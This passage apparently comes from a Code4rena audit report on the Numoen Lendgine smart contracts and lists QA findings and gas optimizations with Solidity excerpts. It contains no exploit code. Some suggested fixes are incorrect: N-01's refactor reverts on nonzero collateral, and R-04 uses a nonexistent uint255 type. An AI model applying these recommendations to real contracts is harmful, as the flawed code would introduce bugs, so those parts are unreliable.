84:    shares = convertLiquidityToShare(liquidity);
86:    if (collateral == 0 || liquidity == 0 || shares == 0) revert InputError();
87:    if (liquidity > totalLiquidity) revert CompleteUtilizationError();
88:    // next check is for the case when liquidity is borrowed but then was completely accrued
89:    if (totalSupply > 0 && totalLiquidityBorrowed == 0) revert CompleteUtilizationError();
91:    totalLiquidityBorrowed += liquidity;
92:    (uint256 amount0, uint256 amount1) = burn(to, liquidity);
93:    _mint(to, shares);
95:    uint256 balanceBefore = Balance.balance(token1);
96:    IMintCallback(msg.sender).mintCallback(collateral, amount0, amount1, liquidity, data);
97:    uint256 balanceAfter = Balance.balance(token1);
99:    if (balanceAfter < balanceBefore + collateral) revert InsufficientInputError();
101:    emit Mint(msg.sender, collateral, shares, liquidity, to);
102:  }

[N-01] The function collect should revert incase the collateral is zero

The function collect is used by user to collect their position interest. As how it’s designed the function ignores if the outcome of the collateral is zero and still executes the function. This is problematic considering an event is emitted, the function not reverting on zero collateral will lead to spamming zero values events. Apply a revert statement, so the function will revert instead of simply ignoring it.


194:  function collect(address to, uint256 collateralRequested) external override nonReentrant returns (uint256 collateral) {
195:    Position.Info storage position = positions[msg.sender]; // SLOAD
196:    uint256 tokensOwed = position.tokensOwed;
198:    collateral = collateralRequested > tokensOwed ? tokensOwed : collateralRequested;
200:    if (collateral > 0) {
201:      position.tokensOwed = tokensOwed - collateral; // SSTORE
202:      SafeTransferLib.safeTransfer(token1, to, collateral);
203:    }
205:    emit Collect(msg.sender, to, collateral);
206:  }

Refactor the above instance to:

function collect(address to, uint256 collateralRequested) external override nonReentrant returns (uint256 collateral) {
    Position.Info storage position = positions[msg.sender]; // SLOAD
    uint256 tokensOwed = position.tokensOwed;

    collateral = collateralRequested > tokensOwed ? tokensOwed : collateralRequested;

    if (collateral > 0) revert ZeroCollater();
      position.tokensOwed = tokensOwed - collateral; // SSTORE
      SafeTransferLib.safeTransfer(token1, to, collateral);

    emit Collect(msg.sender, to, collateral);

[N-02] The check for liquidity in mint is unrealistic, as it can never happen

In the core function mint a check is made to revert in any of the amount collateral, liquidity, shares is zero.
The outcome of the liquidity can never be zero, if the collateral is non zero. Considering the fact that first it check if the collateral is zero and revert, the check for the liquidity is unnecessary and can be removed.


71:  function mint(
72:    address to,
73:    uint256 collateral,
74:    bytes calldata data
75:  )
76:    external
77:    override
78:    nonReentrant
79:    returns (uint256 shares)
80:  {
81:    _accrueInterest();
83:    uint256 liquidity = convertCollateralToLiquidity(collateral);
84:    shares = convertLiquidityToShare(liquidity);
86:    if (collateral == 0 || liquidity == 0 || shares == 0) revert InputError();

Consider removing liquidity == 0 check on L86, as it’s unrealistic from occurring:

86:    if (collateral == 0 || shares == 0) revert InputError();

[N-03] Unnecessary if statement applied in the function sweepToken

In the function sweepToken an if statement is made, which is triggered only if balanceToken is non zero.
This if statement is completely unnecessary, as before that another if statement is made to revert if the balance of the contract is below the minimum amount. As the minimum amount is over zero, there is no need for the second if statement after that.


35:  function sweepToken(address token, uint256 amountMinimum, address recipient) public payable {
36:    uint256 balanceToken = Balance.balance(token);
37:    if (balanceToken < amountMinimum) revert InsufficientOutputError();
39:    if (balanceToken > 0) {
40:      SafeTransferLib.safeTransfer(token, recipient, balanceToken);
41:    }
42:  }

In the above instance if (balanceToken > 0) is not needed and should be removed:

function sweepToken(address token, uint256 amountMinimum, address recipient) public payable {
    uint256 balanceToken = Balance.balance(token);
    if (balanceToken < amountMinimum) revert InsufficientOutputError();

      SafeTransferLib.safeTransfer(token, recipient, balanceToken);

Other instance:


25: function unwrapWETH

[N-04] Require statements missing strings

Require statements should have descriptive strings to describe why the revert occurs.



116: require(amountOutReceived == params.amount);


9: require((z = uint120(y)) == y);
16: require(y < 2 ** 255);

[N-05] Constructor lacks address(0) check

Zero-address check should be used in the constructors, to avoid the risk of setting a storage variable as address(0) at deploying time.



75: constructor(address _factory, address _weth) Payment(_weth) {


49: constructor


17: constructor(address _weth) {


29: constructor(address _uniswapV2Factory, address _uniswapV3Factory) 

[N-06] Confusing revert statement

The modifier checkDeadline is used on both of the core functions mint and burn, the main use of the modifier is to check if the block.timestamp crossed the deadline, so the function can revert. A confusing revert name is used in the modifier, users which got the error won’t understand the reason why the function reverts.


65:  modifier checkDeadline(uint256 deadline) {
66:    if (deadline < block.timestamp) revert LivelinessError();
67:    _;
68:  }

Change the revert statement name, so it can be more understandable


revert Deadline();

[R-01] invariant could just return false if the liquidity is zero

In the function invariant a check is made, so that the function will revert incase liquidity is zero.
If triggered the statement returns (amount0 == 0 && amount1 == 0), so it can revert as inputted amount0 and amount1 can never be zero. Instead of doing all of that a simple false can be applied, so the function can return false and revert.


53:  function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
54:    if (liquidity == 0) return (amount0 == 0 && amount1 == 0);
56:    uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
57:    uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;
59:    if (scale1 > 2 * upperBound) revert InvariantError();
61:    uint256 a = scale0 * 1e18;
62:    uint256 b = scale1 * upperBound;
63:    uint256 c = (scale1 * scale1) / 4;
64:    uint256 d = upperBound * upperBound;
66:    return a + b >= c + d;
67:  }

The above instance can be refactored to:

function invariant(uint256 amount0, uint256 amount1, uint256 liquidity) public view override returns (bool) {
+   if (liquidity == 0) return false;

    uint256 scale0 = FullMath.mulDiv(amount0, 1e18, liquidity) * token0Scale;
    uint256 scale1 = FullMath.mulDiv(amount1, 1e18, liquidity) * token1Scale;

    if (scale1 > 2 * upperBound) revert InvariantError();

    uint256 a = scale0 * 1e18;
    uint256 b = scale1 * upperBound;
    uint256 c = (scale1 * scale1) / 4;
    uint256 d = upperBound * upperBound;

    return a + b >= c + d;

[R-02] Some number values can be refactored with _

Consider using underscores for number values to improve readability.


64: uint256 denominator = (reserveIn * 1000) + amountInWithFee;
80: uint256 numerator = reserveIn * amountOut * 1000;

The instances above can be refactored to:

64: uint256 denominator = (reserveIn * 1_000) + amountInWithFee;
80: uint256 numerator = reserveIn * amountOut * 1_000;

[R-03] Value should be unchecked

In the deposit function the storage variable totalPositionSize is updated, which represents the total amount of positions issued. Considering the fact the variable is of uint256, an overflow in unrealistic and therefore impossible.


145: totalPositionSize = _totalPositionSize + size;

[R-04] 2**<n> - 1 can be refactored as type(uint<n>).max


15:  function toInt256(uint256 y) internal pure returns (int256 z) {
16:    require(y < 2 ** 255);
17:    z = int256(y);
18:  }

The above instance can be refactored to:

function toInt256(uint256 y) internal pure returns (int256 z) {
    require(y < type(uint255).max - 1);
    z = int256(y);

[O-01] Floating pragma

Contracts should be deployed with the same compiler version and flags that they have been tested with thoroughly. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.



[O-02] Use a more recent pragma version

Old version of solidity is used, consider using the new one 0.8.17.
You can see what new versions offer regarding bug fixed here.

Instances - All of the contracts.

[O-03] Events is missing indexed fields

Index event fields make the field more quickly accessible to off-chain.
Each event should use three indexed fields if there are three or more fields.

Instances in:


[O-04] Function Naming suggestions

Proper use of _ as a function name prefix and a common pattern is to prefix internal and private function names with _.
This pattern is correctly applied in the Party contracts, however there are some inconsistencies in the libraries.



10: function sortTokens
17: function pairFor
36: function getReserves
51: function getAmountOut
69: function getAmountIn


69: function newTokensOwed
73: function convertLiquidityToPosition
86: function convertPositionToLiquidity


9: function computeAddress


8: function toUint120
15: function toInt256


12: function balance


12: function addDelta

[O-05] Proper use of get as a function name prefix

Clear function names can increase readability. Follow a standard convertion function names such as using get for getter (view/pure) functions.



10: function sortTokens


9: function computeAddress


53: function invariant

[O-06] Hardcoded values can’t be changed

The storage variables kink, multiplier and jumpMultiplier all use hardcoded values, which can’t be changed in the future.
And these values are the base logic for the calculation of the interest rate curve.



[O-07] PositionMath contains outdated compiler version

Using an outdated compiler version can be problematic especially if there are publicly disclosed bugs and issues that affect the current compiler version. It is recommended to use a recent version of the Solidity compiler.



kyscott18 (Numoen) confirmed and commented:

All the low risk findings have been addressed in other issues so I probably won’t change anything in the codebase that I don’t have to, but this is a very well written summary of issues.

berndartmueller (judge) commented:

Very well-written and thorough QA report! I agree with all the points mentioned.

Gas Optimizations

For this contest, 17 reports were submitted by wardens detailing gas optimizations. The report highlighted below by NoamYakov received the top score from the judge.

The following wardens also submitted reports: Deivitto, Aymen0909, matrix_0wl, RaymondFam, c3phas, nadin, IllIllI, cryptostellar5, Diana, antonttc, 0xackermann, 0xSmartContract, ReyAdmirado, Rolezn, oyc_109, and arialblack14.


Issue Instances Total Gas Saved
[G‑01] Using storage instead of memory for structs/arrays saves gas 2 4200
[G‑02] Structs can be packed into fewer storage slots 4 -
[G‑03] keccak256() should only need to be called on a specific string literal once 1 42
[G‑04] Add unchecked {} for subtractions where the operands cannot underflow because of a previous require() or if-statement 10 850
[G‑05] Multiple accesses of a mapping/array should use a local variable cache 7 294
[G‑06] State variables should be cached in stack variables rather than re-reading them from storage 10 1000
[G‑07] Avoid contract existence checks by using low level calls 18 1800
[G‑08] <x> += <y> costs more gas than <x> = <x> + <y> for state variables (-= too) 4 452

Total: 56 instances over 8 issues with 8638 gas saved.

Gas totals use lower bounds of ranges and count two iterations of each for-loop. All values above are runtime, not deployment, values; deployment values are listed in the individual issue descriptions.

[G‑01] Using storage instead of memory for structs/arrays saves gas

When fetching data from a storage location, assigning the data to a memory variable causes all fields of the struct/array to be read from storage, which incurs a Gcoldsload (2100 gas) for each field of the struct/array. If the fields are read from the new memory variable, they incur an additional MLOAD rather than a cheap stack read. Instead of declaring the variable with the memory keyword, declaring the variable with the storage keyword and caching any fields that need to be re-read in stack variables, will be much cheaper, only incuring the Gcoldsload for the fields actually read. The only time it makes sense to read the whole struct/array into a memory variable, is if the full struct/array is being returned by the function, is being passed to a function that requires memory, or if the array/struct is being read from another memory array/struct.

There are 2 instances of this issue:

File: src\core\Lendgine.sol

/// @audit `rewardPerPositionPaid` isn't used
167     Position.Info memory positionInfo = positions[msg.sender]; // SLOAD

/// @audit `tokensOwed` isn't used
167     Position.Info memory positionInfo = positions[msg.sender]; // SLOAD

[G‑02] Structs can be packed into fewer storage slots

Each slot saved can avoid an extra Gsset (20000 gas) for the first setting of the struct. Subsequent reads as well as writes have smaller gas savings.

There are 4 instances of this issue:

File: src\periphery\LendgineRouter.sol

/// @audit `swapType` can be after `payer`
74    struct MintCallbackData {
75      address token0;
76      address token1;
77      uint256 token0Exp;
78      uint256 token1Exp;
79      uint256 upperBound;
80      uint256 collateralMax;
81      SwapType swapType;
82      bytes swapExtraData;
83      address payer;
84    }

/// @audit `swapType` can be after `recipient`
126   struct MintParams {
127     address token0;
128     address token1;
129     uint256 token0Exp;
130     uint256 token1Exp;
131     uint256 upperBound;
132     uint256 amountIn;
133     uint256 amountBorrow;
134     uint256 sharesMin;
135     SwapType swapType;
136     bytes swapExtraData;
137     address recipient;
138     uint256 deadline;
139   }

/// @audit `swapType` can be after `recipient`
175   struct PairMintCallbackData {
176     address token0;
177     address token1;
178     uint256 token0Exp;
179     uint256 token1Exp;
180     uint256 upperBound;
181     uint256 collateralMin;
182     uint256 amount0Min;
183     uint256 amount1Min;
184     SwapType swapType;
185     bytes swapExtraData;
186     address recipient;
187   }

/// @audit `swapType` can be after `recipient`
240   struct BurnParams {
241     address token0;
242     address token1;
243     uint256 token0Exp;
244     uint256 token1Exp;
245     uint256 upperBound;
246     uint256 shares;
247     uint256 collateralMin;
248     uint256 amount0Min;
249     uint256 amount1Min;
250     SwapType swapType;
251     bytes swapExtraData;
252     address recipient;
253     uint256 deadline;
254   }

[G‑03] keccak256() should only need to be called on a specific string literal once

It should be saved to an immutable variable, and the variable used instead. If the hash is being used as a part of a function selector, the cast to bytes4 should also only be done once.

There is 1 instance of this issue:

File: src\libraries\Balance.sol

13      (bool success, bytes memory data) =
14        token.staticcall(abi.encodeWithSelector(bytes4(keccak256(bytes("balanceOf(address)"))), address(this)));

[G‑04] Add unchecked {} for subtractions where the operands cannot underflow because of a previous require() or if-statement

require(a <= b); x = b - a => require(a <= b); unchecked { x = b - a }.

There are 10 instances of this issue:

File: src\core\JumpRate.sol

/// @audit `if`-condition on line 16
20        uint256 excessUtil = util - kink;
File: src\core\Lendgine.sol

/// @audit ternary expression on line 198
201       position.tokensOwed = tokensOwed - collateral; // SSTORE

244     uint256 timeElapsed = block.timestamp - lastUpdate;

/// @audit ternary expression on line 253
256     totalLiquidityBorrowed = _totalLiquidityBorrowed - dilutionLP;
File: src\core\Pair.sol

/// @audit checked arithmetic on line 106
108     reserve0 = _reserve0 - SafeCast.toUint120(amount0); // SSTORE

/// @audit checked arithmetic on line 106
109     reserve1 = _reserve1 - SafeCast.toUint120(amount1); // SSTORE

/// @audit checked arithmetic on line 106
110     totalLiquidity = _totalLiquidity - liquidity; // SSTORE

/// @audit checked arithmetic on line 131
135     reserve0 = _reserve0 + SafeCast.toUint120(amount0In) - SafeCast.toUint120(amount0Out); // SSTORE

/// @audit checked arithmetic on line 131
136     reserve1 = _reserve1 + SafeCast.toUint120(amount1In) - SafeCast.toUint120(amount1Out); // SSTORE
File: src\periphery\SwapHelper.sol

107         zeroForOne ? TickMath.MIN_SQRT_RATIO + 1 : TickMath.MAX_SQRT_RATIO - 1,

[G‑05] Multiple accesses of a mapping/array should use a local variable cache

The instances below point to the second+ access of a value inside a mapping/array, within a function. Caching a mapping’s value in a local storage or calldata variable when the value is accessed multiple times, saves ~42 gas per access due to not having to recalculate the key’s keccak256 hash (Gkeccak256 - 30 gas) and that calculation’s associated stack operations. Caching an array’s struct avoids recalculating the array offsets into memory/calldata.

There are 7 instances of this issue:

File: src\core\Factory.sol

/// @audit `getLendgine[token0]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1][token0Exp]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1][token0Exp][token1Exp]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;
File: src\periphery\LiquidityManager.sol

/// @audit `positions[params.recipient]` on line 175
182     positions[params.recipient][lendgine] = position; // SSTORE

/// @audit `positions[msg.sender]` on line 211
218     positions[msg.sender][lendgine] = position; // SSTORE

/// @audit `positions[msg.sender]` on line 235
244     positions[msg.sender][params.lendgine] = position; // SSTORE

[G‑06] State variables should be cached in stack variables rather than re-reading them from storage

The instances below point to the second+ access of a state variable within a function. Caching of a state variable replaces each Gwarmaccess (100 gas) with a much cheaper stack read. Other less obvious fixes/optimizations include having local memory caches of state variable structs, or having local caches of state variable contracts/addresses.

There are 10 instances of this issue:

File: src\core\Factory.sol

/// @audit `getLendgine[token0]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1][token0Exp]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;

/// @audit `getLendgine[token0][token1][token0Exp][token1Exp]` on line 76
86      getLendgine[token0][token1][token0Exp][token1Exp][upperBound] = lendgine;
File: src\core\Lendgine.sol

/// @audit `totalPositionSize` on line 135
142     if (totalLiquiditySupplied == 0 && totalPositionSize > 0) revert CompleteUtilizationError();

/// @audit `totalPositionSize` on line 163
176     totalPositionSize -= size;

/// @audit `totalLiquidityBorrowed` on line 239
247     uint256 _totalLiquidityBorrowed = totalLiquidityBorrowed; // SLOAD
File: src\periphery\LiquidityManager.sol

/// @audit `positions[params.recipient]` on line 175
182     positions[params.recipient][lendgine] = position; // SSTORE

/// @audit `positions[msg.sender]` on line 211
218     positions[msg.sender][lendgine] = position; // SSTORE

/// @audit `positions[msg.sender]` on line 235
244     positions[msg.sender][params.lendgine] = position; // SSTORE

[G‑07] Avoid contract existence checks by using low level calls

Prior to 0.8.10 the compiler inserted extra code, including EXTCODESIZE (100 gas), to check for contract existence for external function calls. In more recent solidity versions, the compiler will not insert these checks if the external call has a return value. Similar behavior can be achieved in earlier versions by using low-level calls, since low level calls never check for contract existence.

There are 18 instances of this issue:

File: src\core\ImmutableState.sol

/// @audit parameters()
33      (token0, token1, _token0Exp, _token1Exp, upperBound) = Factory(msg.sender).parameters();
File: src\periphery\LendgineRouter.sol

/// @audit mint()
147     shares = ILendgine(lendgine).mint(
148       address(this),
149       params.amountIn + params.amountBorrow,
150       abi.encode(
151         MintCallbackData({
152           token0: params.token0,
153           token1: params.token1,
154           token0Exp: params.token0Exp,
155           token1Exp: params.token1Exp,
156           upperBound: params.upperBound,
157           collateralMax: params.amountIn,
158           swapType: params.swapType,
159           swapExtraData: params.swapExtraData,
160           payer: msg.sender
161         })
162       )
163     );

/// @audit reserve0()
198     uint256 r0 = ILendgine(msg.sender).reserve0();

/// @audit reserve1()
199     uint256 r1 = ILendgine(msg.sender).reserve1();

/// @audit totalLiquidity()
200     uint256 totalLiquidity = ILendgine(msg.sender).totalLiquidity();

/// @audit convertLiquidityToCollateral()
231     uint256 collateralTotal = ILendgine(msg.sender).convertLiquidityToCollateral(liquidity);

/// @audit burn()
266     amount = ILendgine(lendgine).burn(
267       address(this),
268       abi.encode(
269         PairMintCallbackData({
270           token0: params.token0,
271           token1: params.token1,
272           token0Exp: params.token0Exp,
273           token1Exp: params.token1Exp,
274           upperBound: params.upperBound,
275           collateralMin: params.collateralMin,
276           amount0Min: params.amount0Min,
277           amount1Min: params.amount1Min,
278           swapType: params.swapType,
279           swapExtraData: params.swapExtraData,
280           recipient: recipient
281         })
282       )
283     );
File: src\periphery\LiquidityManager.sol

/// @audit reserve0()
140     uint256 r0 = ILendgine(lendgine).reserve0();

/// @audit reserve1()
141     uint256 r1 = ILendgine(lendgine).reserve1();

/// @audit totalLiquidity()
142     uint256 totalLiquidity = ILendgine(lendgine).totalLiquidity();

/// @audit deposit()
157     uint256 size = ILendgine(lendgine).deposit(
158       address(this),
159       params.liquidity,
160       abi.encode(
161         PairMintCallbackData({
162           token0: params.token0,
163           token1: params.token1,
164           token0Exp: params.token0Exp,
165           token1Exp: params.token1Exp,
166           upperBound: params.upperBound,
167           amount0: amount0,
168           amount1: amount1,
169           payer: msg.sender
170         })
171       )
172     );

/// @audit positions()
177     (, uint256 rewardPerPositionPaid,) = ILendgine(lendgine).positions(address(this));

/// @audit withdraw()
208     (uint256 amount0, uint256 amount1, uint256 liquidity) = ILendgine(lendgine).withdraw(recipient, params.size);

/// @audit positions()
213     (, uint256 rewardPerPositionPaid,) = ILendgine(lendgine).positions(address(this));

/// @audit positions()
237     (, uint256 rewardPerPositionPaid,) = ILendgine(params.lendgine).positions(address(this));

/// @audit collect()
246     uint256 collectAmount = ILendgine(params.lendgine).collect(recipient, amount);
File: src\periphery\SwapHelper.sol

/// @audit swap()
103       (int256 amount0, int256 amount1) = pool.swap(
104         params.recipient,
105         zeroForOne,
106         params.amount,
107         zeroForOne ? TickMath.MIN_SQRT_RATIO + 1 : TickMath.MAX_SQRT_RATIO - 1,
108         abi.encode(params.tokenIn)
109       );
File: src\periphery\UniswapV2\libraries\UniswapV2Library.sol

/// @audit getReserves()
46      (uint256 reserve0, uint256 reserve1,) = IUniswapV2Pair(pairFor(factory, tokenA, tokenB)).getReserves();

[G‑08] <x> += <y> costs more gas than <x> = <x> + <y> for state variables (-= too)

Using the addition operator instead of plus-equals saves 113 gas. Subtractions act the same way.

There are 4 instances of this issue:

File: src\core\Lendgine.sol

91      totalLiquidityBorrowed += liquidity;

114     totalLiquidityBorrowed -= liquidity;

176     totalPositionSize -= size;

257     rewardPerPositionStored += FullMath.mulDiv(dilutionSpeculative, 1e18, totalPositionSize);


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C4 Contests incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Contest submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.